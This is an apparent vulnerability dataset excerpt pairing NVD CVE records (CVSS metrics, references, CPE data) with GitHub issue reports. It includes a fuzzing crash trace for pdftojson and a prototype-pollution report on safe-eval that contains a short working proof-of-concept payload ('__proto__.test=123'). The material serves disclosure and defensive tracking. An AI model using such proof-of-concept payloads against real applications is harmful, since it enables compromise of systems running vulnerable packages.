#139 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#140 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#141 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#142 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#143 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#144 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#145 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#146 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#147 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#148 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#149 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#150 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#151 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#152 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#153 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#154 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#155 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#156 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#157 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#158 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#159 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#160 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#161 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#162 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#163 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#164 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#165 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#166 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#167 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#168 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#169 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#170 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#171 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#172 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#173 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#174 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#175 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#176 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#177 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#178 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#179 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#180 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#181 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#182 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#183 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#184 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#185 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#186 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#187 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#188 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#189 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#190 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#191 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#192 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#193 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#194 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#195 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#196 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#197 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#198 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#199 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#200 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#201 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#202 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#203 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#204 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#205 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#206 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#207 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#208 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#209 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#210 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#211 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#212 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#213 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#214 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#215 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#216 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#217 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#218 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#219 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#220 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#221 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#222 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#223 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#224 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#225 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#226 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#227 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#228 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#229 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#230 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#231 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#232 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#233 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#234 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#235 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#236 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#237 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#238 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#239 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#240 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#241 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#242 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#243 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#244 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#245 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#246 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#247 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#248 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#249 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#250 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#251 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#252 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#253 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#254 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#255 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#256 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#257 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#258 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#259 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#260 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#261 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#262 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#263 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#264 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#265 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#266 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#267 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#268 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#269 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#270 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#271 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#272 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#273 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#274 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#275 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#276 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#277 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#278 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#279 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#280 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#281 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#282 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#283 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#284 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#285 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#286 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#287 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#288 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#289 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#290 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#291 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#292 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#293 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#294 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#295 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#296 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#297 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#298 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#299 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#300 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#301 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#302 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#303 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
#304 0x6a8137 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:101:18
#305 0x7775b9 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:1028:13
#306 0x6d510f in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#307 0x6d510f in Stream::addFilters(Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Stream.cc:144:11
#308 0x6a9e9c in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int, int) /AFLplusplus/my_test/pdftojson-master/xpdf/Parser.cc:214:14
SUMMARY: AddressSanitizer: stack-overflow (/lib/x86_64-linux-gnu/libc.so.6+0x91ff2) in _IO_default_xsputn
==11959==ABORTING
```
### Poc
Poc file is this.
[000009.zip](https://github.com/ldenoue/pdftojson/files/8499043/000009.zip)
| stack-buffer-overflow was discovered in Stream::makeFilter(char*, Stream*, Object*, int) | https://api.github.com/repos/ldenoue/pdftojson/issues/4/comments | 0 | 2022-04-16T01:26:43Z | 2022-04-16T01:26:43Z | https://github.com/ldenoue/pdftojson/issues/4 | 1,205,976,457 | 4 | 4,530 |
CVE-2022-25904 | 2022-12-20T05:15:11.487 | All versions of package safe-eval are vulnerable to Prototype Pollution which allows an attacker to add or modify properties of the Object.prototype.Consolidate when using the function safeEval. This is because the function uses vm variable, leading an attacker to modify properties of the Object.prototype. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hacksparrow/safe-eval/issues/26"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-SAFEEVAL-3175701"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hacksparrow/safe-eval/issues/26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-SAFEEVAL-3175701"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/hacksparrow/safe-eval/issues/26 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"hacksparrow",
"safe-eval"
] | Affected versions of this package are vulnerable to Prototype Pollution which can allow an attacker to add/modify properties of the Object.prototype.Consolidate runs the risk of Prototype Pollution when using the function safeEval.The function use vm lead an attacker to modify properties of the Object.prototype.the risk locate is in here
https://github.com/hacksparrow/safe-eval/blob/23319e33f96b59ce547c847137ad751878dcbbd4/index.js#L24
and the POC is as follow:
var unsafe= require("safe-eval")
console.log({}.test) //undefined
unsafe("__proto__.test=123")
console.log({}.test) //123 | Prototype pollution in function safeEval in the file index.js | https://api.github.com/repos/hacksparrow/safe-eval/issues/26/comments | 1 | 2022-12-17T06:50:01Z | 2022-12-21T07:32:59Z | https://github.com/hacksparrow/safe-eval/issues/26 | 1,501,222,474 | 26 | 4,531 |
CVE-2021-4264 | 2022-12-21T19:15:12.520 | A vulnerability was found in LinkedIn dustjs up to 2.x and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is ddb6523832465d38c9d80189e9de60519ac307c3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216464. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
